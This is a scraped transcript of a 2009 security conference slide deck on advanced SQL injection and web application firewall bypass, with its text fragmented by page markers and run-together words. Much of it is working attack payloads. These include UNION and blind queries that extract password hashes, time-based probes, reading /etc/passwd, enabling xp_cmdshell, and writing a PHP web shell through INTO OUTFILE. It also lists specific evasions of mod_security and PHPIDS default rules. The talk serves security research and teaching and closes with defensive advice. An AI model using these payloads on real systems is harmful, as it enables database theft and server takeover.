pt devteev advanced sql injection eng 091118184202 phpapp02
TRANSCRIPT
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
1/62
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
2/62
Subjects in Question
Introduction to web application security
Classical approach to SQL Injection exploitation
Blind SQL Injection
Working with file system and executing commands on serverunder SQL Injection exploitation
Methods to bypass program security filters
Methods to bypass a Web Application Firewall (WAF)
Conclusions
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
3/62
Introduction to Web Application Security
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
4/62
Unsafe World of Web Applications
According to the statistics collected by PositiveTechnologies in 2008,
83% of sites contain critical vulnerabilities
78% of sites contain vulnerabilities of moderate risk level
the probability to infect the pages of a vulnerable webapplication with malicious code automatically is about 15-20%
http://ptsecurity.ru/analytics.asp
The data is based on automatic scanning of 16121 systems, detailed analysis of 59 web applications
including analysis of the source code of over 10 applications.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
5/62
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
6/62
Chapter 1: SQL Injection Vulnerability
Classical Approach to SQL Injection Exploitation
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
7/62
Illustrative Example of SQL Injection
Web Server DBMShttp://web/?id=6329&print=Y
.
SELECT * from news where id = 6329.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
8/62
Illustrative Example of SQL Injection
Web Server DBMShttp://web/?id=6329+union+select+id,pwd,0+from...
.
SELECT * from news where id = 6329 union select id,pwd,0 from.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
9/62
SQL Injection Basic Concepts
SQL Injection
A method to attack a database bypassing firewalls. In thismethod, parameters transmitted to the database via webapplications are modified so that the executable SQL requestchanges.
There are two types of SQL Injection
SQL Injection into a string parameter
Examples:
SELECT * from table where name = "$_GET['name']"
SELECT id, acl from table where user_agent ='$_SERVER["HTTP_USER_AGENT"]'
SQL Injection into a numeric parameter
Examples:SELECT login, name from table where id = $_COOKIE["id"]
SELECT id, news from table where news = 123 limit $_POST["limit"]
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
10/62
SQL Injection Basic Concepts
Methods of SQL Injection exploitation are classified
according to the DBMS type and exploitation conditions
Vulnerable request can implement Insert, Update, Delete
It is possible to inject SQL code into any part of SQL request
Blind SQL Injection
Features of SQL implementations used in various DBMSs
SQL Injection vulnerability is characteristic not only for webapplications!
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
11/62
SQL Injection Basic Concepts
SQL Injection classification
SQL Injection can be exploited both during the attack conductionor after a while
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
12/62
SQL Injection Basic Concepts
Methods to detect SQL Injection
Function testing (black/white-box)
Fuzzing
Static/dynamic/manual analysis of the source code
Examples of function testing for http://site/?param=123
http://site/?param=1' http://site/?param=1'#
http://site/?param=1"
http://site/?param=1 order by 1000 http://site/?param=1 AND 1=1--
http://site/?param=1'-- http://site/?param=1 AND 1=2--
...
http://site/?param=1'/* http://site/?param=1' AND '1'='1
... etc.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
13/62
SQL Injection Classical Exploitation (MySQL)
Vulnerability detection
/?id=1+ORDER+BY+100
SQL request looks like
SELECT id, name from table where id =1 ORDER BY 100
As a result, the following error message can be received
ERROR 1054 (42S22): Unknown column '100' in 'order clause'
Obtaining table/column names (information_schema/search) and furtherobtaining data from the discovered tables
/?id=1+union+select+0,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns
SQL request becomes
SELECT id, name from table where id =1 union select
0,concat_ws(0x3a,table_name,column_name) from information_schema.columns
As a result, the desired information can be received in the following form
| 0 | table1:column1 || 0 | table1:column2 |
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
14/62
SQL Injection Features of Different DBMSs
Features of exploitation for different DBMSExample (MySQL): SELECT * from table where id = 1 union select 1,2,3Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual
MySQL MSSQL MS Access Oracle DB2 PostgreSQL
String concatenationconcat(,)
concat_ws(delim,)' '+' ' " "&" " ' '||' '
'' concat ''
" "+" "
' '||' '
' '||' '
Comments -- and /**/ and # -- and /* No -- and /* -- -- and /*
Request union union union and ; union union union union and ;
Sub-requests v.4.1 >= Yes No Yes Yes Yes
Stored procedures No Yes No Yes No Yes
Availability of
information_schema or its analogsv.5.0 >= Yes Yes Yes Yes Yes
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
15/62
SQL Injection Exploitation for Different DBMSs
MySQL 4.1>=
First entry/?id=1 union select name,123 from users limit 0,1 Second entry/?id=1 union select name,123 from users limit 1,1
MSSQL
First entry/?id=1 union select table_name,123 from (select row_number() over (order by name) as
rownum, name from users) as t where t.rownum=1
Second entry/?id=1 union select table_name,123 from (select row_number() over (order by name) as
rownum, name from users) as t where t.rownum=2
PostgreSQL
First entry/?id=1 union select name, null from users limit 1 offset 0 Second entry/?id=1 union select name, null from users limit 1 offset 1
or
First entry/?id=1; select name, 123 from users limit 1 offset 0 Second entry/?id=1; select name, 123 from users limit 1 offset 1
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
16/62
Chapter 2: Blind SQL Injection
Blind SQL Injection
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
17/62
Blind SQL Injection Basic Concepts
Blind SQL Injection
A method to attack a database bypassing firewalls. In the courseof exploitation of an SQL Injection vulnerability, the attackeranalyses the application logic (true/false).
Blind SQL Injections can be classified according to thefollowing criteria
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
18/62
Blind SQL Injection Basic Concepts
Methods to detect Blind SQL Injection
http://site/?param=-1 OR 1=1http://site/?param=-1 OR 1=1--...http://site/?param=-1'http://site/?param=-1' AND 1=2...http://site/?param=-1' OR '1'='1...http://site/?param=-1"/*...
http://site/?param=2http://site/?param=1http://site/?param=2-1...http://site/?param=1' AND 1=1http://site/?param=1' AND '1'='1etc.
Methods to detect Double Blind SQL Injection
http://site/?param=-1 AND benchmark(2000,md5(now()))...http://site/?param=-1' AND benchmark(2000,md5(now()))--...etc.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
19/62
Blind SQL Injection Classical Exploitation (MySQL)
Searching for the first character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1 ),1,1))=97,555,777)
SQL request becomes
SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from userslimit 0,1),1,1))=97,555,777)
If the table users contains a column pass and the first character of the first entryin this column is 97 (letter a), then DBMS will return TRUE; otherwise, FALSE.
Searching for the second character of the first table entry
/?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1), 2,1))=97,555,777)
SQL request becomes
SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from userslimit 0,1),2,1))=97,555,777)
If the table users contains a column pass and the second character of the firstentry in this column is 97 (letter
a) , then DBMS will return TRUE; otherwise, FALSE.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
20/62
Blind SQL Injection Classical Exploitation (MySQL)Lets go faster
We can restrict the range of character search. For example, for MD5 it is [0-9a-f], or 48-57, 97-102. Moreover, we can use the inequality signs!
Searching for the first character of the first table entry
/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+0,1),1,1)))>97,555,777)
If the table users contains a column pass and the first character of the first entryin this column is greater than 97 (letter a), then DBMS will return TRUE; otherwise,FALSE.
Searching for the first character of the second table entry
/?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+1,1),1,1)))
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
21/62
Blind SQL Injection New Methods of Exploitation(MySQL) and even faster
It is possible to find up to 12 characters using one request (method by QwazarX0709)
Searching for the first character of the first table entry
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,
(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,
(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,
(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in(' 3'))>0,
(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,
(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,
(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,
(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,
(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,
(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,
(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,
(select 1 union select 2),(1)))))))))))))
If the table users contains a column pass and the first character of the first entry inthis column belongs to the range [0-9a], then DBMS will return an error message.Otherwise, it will return 1, i.e. the request will be correct.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
22/62
Blind SQL Injection New Methods of Exploitation(MySQL) at the same rate
How does it work?
MySQL returns unique error messages using illegal regexps:
select 1 regexp if(1=1,"x{1,0}",2)
#1139 - Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 - Got error 'braces not balanced' from regexp
etc.
An error message is also displayed if two entries are unexpectedlyreturned instead of one (method by Elekt):
select if(1=1,(select 1 union select 2),2)
#1242 - Subquery returns more than 1 row
Note: in the example, hexadecimal equivalents were used, e.g. 0x787B312C307D instead x{1,0}
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
23/62
Blind SQL Injection New Methods of Exploitation(MySQL) at the same rate
If it is necessary to find an MD5 hash, only two requests are required.
Request1
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 unionselect 2),(1)))))))))))))
If the character does not belong to the range [0-9a], then the second requestis sent (checking [b-f])
/?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit
+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 unionselect 2),(1)))))))))))))
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
24/62
Blind SQL Injection New Methods of Exploitation(MySQL) at the maximal rate!
A new method using function ExtractValue() based on experimentswith function NAME_CONST() MySQL v. 5.0.12 > v.5.0.64 (X0909)conducted by Qwazar:
select 1 AND ExtractValue(1,concat(0x5C,('test')));
As a result, the following error message can be received (if MySQL version is >=5.1)
XPATH syntax error: '\test'
Thus, we can simply return the desired data:
/?id=1+AND+extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))
SQL request becomes
SELECT id, name from table where id =1 AND extractvalue(1,concat(0x5C,(select passfrom users limit 0,1)))
As a result, the desired information can be received in the following form
The error message string cannot contain more than 31 characters. Function mid() andsuch-like can be applied to display longer strings.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
25/62
Blind SQL Injection New Methods of Exploitation(MySQL) The Rate Limit
What if error messages are suppressed?
We can restrict the range of character search. For example, for MD5 this rangeis [0-9a-f].
We can use news titles, site sections etc. as signatures.
Implementation:
/?id=if((mid((select pwd from users limit 0,1),1,1)in('a'))>0,(12345),if((mid((select pwdfrom users limit 0,1),1,1)in('b'))>0,(12346), .. ,null))
or
/?id=if((mid((select pwd from users limit0,1),1,1)in('a','b','c','d','e','f'))>0,(12345),if((mid((select pwd from users limit0,1),1,1)in('0','1','2','3','4','5','6','7','8','9'))>0,(12346), .. ,null))
In this example, 12345 and 123456represent identifiers of news on the site.
Restrictions of this method: Appropriate application architecture;
The length of HTTP request cannot be more than 4096 bytes.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
26/62
Double Blind SQL Injection Classical Exploitation(MySQL) More haste, less speed;)
Exploitation of Double Blind SQL Injection is based on time delays.
We can restrict the range of character search to increase performance.
Classical implementation:
/?id=1+AND+if((ascii(lower(substring((select password from user limit0,1),0,1))))=97,1,benchmark(2000000,md5(now())))
We can conjecture that the character was guessed right on the basis of the time delayof web server response;
Manipulating the value 2000000: we can achieve acceptable performance for aconcrete application;
Function sleep() represents an analogue of function benchmark(). Function sleep() ismore secure in the given context, because it doesnt use server resources.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
27/62
Chapter 3: Working with File System and ExecutingCommands on Server
Working with File System and Executing Commands onServer Under SQL Injection Exploitation
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
28/62
Working with File System
General architecture of using file system via SQL
Injection
uid=80(www) gid=80(www) If you access a file created by DBMS, it is
necessary to keep in mind that the file owneris the user called DBMS
uid=88(mysql) gid=88(mysql) Requests are received from the DBMS user (to
work with file system, privileges file_priv arerequired)
File system is accessed by the DBMS user(appropriate permissions are required at theACL level)
Current directory represents the DBMSdirectory
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
29/62
Working with File System Difference of DBMSs
An example for MSSQL:
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
SELECT * FROM mydata;
DROP TABLE mydata;
MySQL MSSQL MS Access Oracle PostgreSQL
Built-in functions Yes No Yes No Yes
Available functions
load_file, load data
infile, into
otfile/dumpfile
Procedures
eq insert
from file
curdir()
Procedures
eq insert
from file
pg_read_file(),
pg_ls_dir(), copy,
etc.
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
30/62
Working with File System
An example for MySQL
LOAD_FILE union select load_file('/etc/passwd')
LOAD DATA INFILE
create table t(a varchar(500)); load data infile '/etc/passwd' into table t;
select a from t;
SELECT INTO OUTFILE SELECT INTO DUMPFILE union select 1 into outfile 't'
union select 1 into dumpfile 't'
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
31/62
Executing Commands on Server Difference of DBMSs
An example for MSSQL:EXEC xp_cmdshell 'ipconfig /all';
To use xp_cmdshell in MSSQL >= 2005, it is necessary toperform the following:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
MySQL MSSQL MS Access Oracle PostgreSQL
Built-in functions No Yes Yes No No
aila le functions No EXE s ell()Own
proceduresOwn procedures
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
32/62
Executing Commands on Server
An example for SQL
Writing web-shell to the file /www/img/shell.php
/?id=1+union+select+''+into+outfile+'/www/img/shell.php'
Executing commands on server
/img/shell.php?shell=passthru('ls');
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
33/62
Chapter 4: Methods to Bypass Security Filters
Methods to Bypass Security Filters
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
34/62
Filters for Incoming data. Types
Transparent for web applications
magic_quotes_gpc, display_errors, etc.
mod_rewrite, ISAPI filters, etc.
Built-in functions of the development language
Universal
Example: addslashes(), addcslashes(), htmlspecialchars(), etc
Meant for a certain environmentExample: mysql_real_escape_string(), pg_escape_string(),dbx_escape_string(), etc
In-house design of a programmer
Type casting
Using regular expressions
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
35/62
Methods to Bypass Security Filters (1)
Apply coding to the data transmitted to the application
There is unlimited number of forms to represent the stringqwerty
Hex coding: 0x717765727479
ASCII representation: char(113),char(119),char(101),char(114),char(116),char(121)
Encryption with various keys: i~)=
Example:
hex(AES_ENCRYPT('qwerty',1)) is B969A9A01DA8E78FA8DD7E299C9CF23D
aes_decrypt(concat(0xB9,0x69,0xA9,0xA0,0x1D,0xA8,0xE7,0x8F,0xA8,0xDD,0x7E,0x29,0x9C,0x9C,0xF2,0x3D),1) is qwerty
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
36/62
Methods to Bypass Security Filters (2)
Apply codes that are not processed by the filter
Function synonyms
CHARACTER_LENGTH() -> CHAR_LENGTH()
LOWER() -> LCASE()
OCTET_LENGTH() -> LENGTH()
LOCATE() -> POSITION()
REGEXP() -> RLIKE()
UPPER() -> UCASE()
etc.
Obfuscated codes for requests and data
Examples of obfuscated codes for the string qwerty:
reverse(concat(if(1,char(121),2),0x74,right(left(0x567210,2),1),lower(mid('TEST',2,1)),replace(0x7074,'pt','w'),char(instr(123321,33)+110)))
concat(unhex(left(crc32(31337),3)-400),unhex(ceil(atan(1)*100-2)),unhex(round(log(2)*100)-4),char(114),char(right(cot(31337),2)+54),char(pow(11,2)))
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
37/62
Methods to Bypass Security Filters
An example of bypassing signatures (obfuscated code for
request)
The following request will correspond to the applicationsignature
/?id=1+union+(select+1,2+from+test.users)
But sometimes the signatures can be bypassed
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)unIon(selEct(1),mid(hash,1,32)from(test.users))
/?id=1+union+(sELect'1',concat(login,hash)from+test.users)
/?id=(1)union(((((((select(1),hex(hash)from(test.users))))))))
/?id=(1);exec('sel'+'ect'(1))
/?id=(1)or(0x50=0x50)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
38/62
Methods to Bypass Security Filters (3)
Use null-byte to bypass binary-dependent functions
Example: if(ereg ("^(.){1,3}$", $_GET['param'])) { }
/?param=123
ereg ("^(.){1,3}$", "123") true
/?param=1234
ereg ("^(.){1,3}$", "1234") false
/?param=1+union+select+1
ereg ("^(.){1,3}$", "1 union select 1") false
/?param=123%00
ereg ("^(.){1,3}$", "123\0") - true
/?param=1/*%00*/union+select+1
ereg ("^(.){1,3}$", "1/*\0*/union select 1") - true
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
39/62
Methods to Bypass Security Filters (4)
Bypassing function addslashes()
It is possible if there is a vulnerability that allows attackers to setSJIS, BIG5 or GBK coding
How does it work?
addslashes("'") .. 0x27 "\'" .. 0x5c27
An example for GBK coding:
0xbf27 illegal character
0xbf5c valid independent character
0xbf27, being processed with function addslashes(), becomes 0xbf5c27,i.e. 0xbf5c and a single quote 0x27
Raz0r, http://raz0r.name/vulnerabilities/sql-inekcii-svyazannye-s-multibajtovymi-kodirovkami-i-
addslashes/
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
40/62
Methods to Bypass Security Filters (5)
A common vulnerability in the functions of security filters
The following request doesnt allow malicious users to conduct an attack
/?id=1+union+select+1,2,3/*
If there is a corresponding vulnerability in the filter, the following requestwill be successfully processed
/?id=1+un/**/ion+sel/**/ect+1,2,3--
SQL request becomes
SELECT * from table where id =1 union select 1,2,3--
Any set of characters that is cut by the filter (e.g. #####, %00, etc.) can be usedinstead of /**/
The given example works in case of "superfluous cleaning" of incoming data(replacing regexp with an empty string)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
41/62
Chapter 5: Methods to Bypass Web Application Firewall
Methods to Bypass Web Application Firewall (WAF)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
42/62
What is WAF
http://server/?id=6329&print=Y
At attack is detected!
Alarm!!!
WAF Webserverhttp://server/?id=5351
http://server/?id=8234
http://server/?id=>...
http://server/?id=1+union+select...
http://server/?id=/../../../etc/passwd
Data normalizationDecode HTML entities (e.g. c, ", )
Escaped characters (e.g. \t, \001, \xAA, \uAABB)
Null byte string termination...
Signature search
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
...
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
43/62
Classification
According to the behavior:
Bridge/Router
Reverse Proxy
Built-in
According to the protection model:
Signature-based
Rule-based
According to the response to a bad request:
Cleaning of dangerous data
Blocking the request
Blocking the attack source
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
44/62
Methods to Bypass WAF
Fundamental technology limitations
Inability to protect a web-application from all possiblevulnerabilities
General problems
When using universal WAF-filters, it is necessary to balance thefilter efficiency and minimization error responses, when validtraffic is blocked
Processing of the traffic returned to a client
Implementation Vulnerabilities
Normalization techniques
Application of new methods of web vulnerability exploitation(HTTP Parameter Pollution, HTTP Parameter Fragmentation, null-byte replacement, etc.)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
45/62
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
46/62
Practice of Bypassing WAF: SQL Injection HPP(example 1)
Using HTTP Parameter Pollution (HPP)
The following request doesnt allow anyone to conduct an attack
/?id=1;select+1,2,3+from+users+where+id=1--
This request will be successfully performed using HPP
/?id=1;select+1&id=2,3+from+users+where+id=1--
Successful conduction of an HPP attack bypassing WAFdepends on the environment of the application beingattacked
OWASP EU09 Luca Carettoni, Stefano diPaola
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
47/62
Practice of Bypassing WAF: SQL Injection HPP
How does it work?
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
48/62
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
49/62
Practice of Bypassing WAF: SQL Injection HPP(example 2)
Using HTTP Parameter Pollution (HPP)
Vulnerable code
SQL="select key from table where id="+Request.QueryString("id")
This request is successfully performed using the HPP technique
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&i
d=*/users
The SQL request becomes
select key from table whereid=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
Lavakumar Kuppan,http://lavakumar.com/Split_and_Join.pdf
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
50/62
Practice of Bypassing WAF: SQL Injection HPF
Using HTTP Parameter Fragmentation (HPF)
Vulnerable code example
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);
The following request doesnt allow anyone to conduct an attack
/?a=1+union+select+1,2/*
These requests maybe successfully performed using HPF
/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
The SQL requests become
select * from table where a=1 union/* and b=*/select 1,2
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
51/62
Practice of Bypassing WAF: Blind SQL Injection
Using logical requests AND/OR
The following requests allow one to conduct a successful attack for manyWAFs
/?id=1+OR+0x50=0x50
/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Negation and inequality signs (!=, , ) can be used instead of the
equality one It is amazing, but many WAFs miss it!It becomes possible to exploit the vulnerability with the method of blind-SQLInjection by replacing SQL functions that get to WAF signatures with theirsynonyms
substring() -> mid(), substr(), etc
ascii() -> hex(), bin(), etc
benchmark() -> sleep()
The given example is valid for all WAFs whose developers aim to cover asmany web-applications as possible
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
52/62
Practice of Bypassing WAF: Blind SQL Injection
Known:
substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70
New:
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the firstargument is smaller than the second one, and 1 otherwise
http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
53/62
Practice of Bypassing WAF: Blind SQL Injection
Blind SQL Injection doesnt always imply use of AND/OR!
Vulnerable code examples
Query("select * from table where uid=".$_GET['uid']);
Query("select * from table where card=".$_GET['card']);
Exploitation examples
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)%2B112233
false: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x61)%2B112233
true: index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x62)%2B112233
first hash character = B
false: ...
false: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6240)%2B112233
true: index.php?uid=strcmp(left((select/**/hash/**/from/**/users/**/limit/**/0,1),2),0x6241)%2B112233
second hash character = A
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
54/62
Practice of Bypassing WAF: SQL Injection SignatureBypass
PHPIDS (0.6.1.1) default rules
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
55/62
Practice of Bypassing WAF: SQL Injection SignatureBypass
Mod_Security (2.5.9) default rules
Forbid:/?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows:/?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
56/62
Conclusions
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
57/62
SQL Injection in wildlife
SQL Injection can be found even in widely known andlarge Internet resources
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
58/62
Conclusions
SQL Injection is a gross programming error, which iswidespread and very dangerous
WAF is not the long-expected silver bullet
WAF doesnt eliminate a vulnerability, it just partly screensthe attack vector
Conceptual problems of WAF application of the signature
principle
Correctly organized Software Development Life Cycle(SDLC) considerably reduces the probability that avulnerability will appear in program code
Web application protection (and information security inwhole) must be comprehensive :)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
59/62
Automated Exploitation of SQL Injection
sqlmap (http://sqlmap.sourceforge.net/) Full support: MySQL, Oracle, PostgreSQL Microsoft SQL Server
Partial support: Microsoft Access, DB2, Informix, Sybase Interbase
sqlus (http://sqlsus.sourceforge.net/) Only MySQL support is implemented
bsqlbf-v2 (http://code.google.com/p/bsqlbf-v2/ It isnt oriented on Blind SQL Injections any more. The following
systems are supported: MySQL, Oracle, PostgreSQL, and MicrosoftSQL Server
In view of development of new fast techniques of Blind SQL
Injection exploitation in MySQL, they are going to release acorresponding proof of concept (it will be available onhttp://www.milw0rm.com/papers/)
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
60/62
Automatic detection of SQL Injection
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
61/62
-
8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02
62/62
Thank you for yourattention!
[email protected]://devteev.blogspot.com/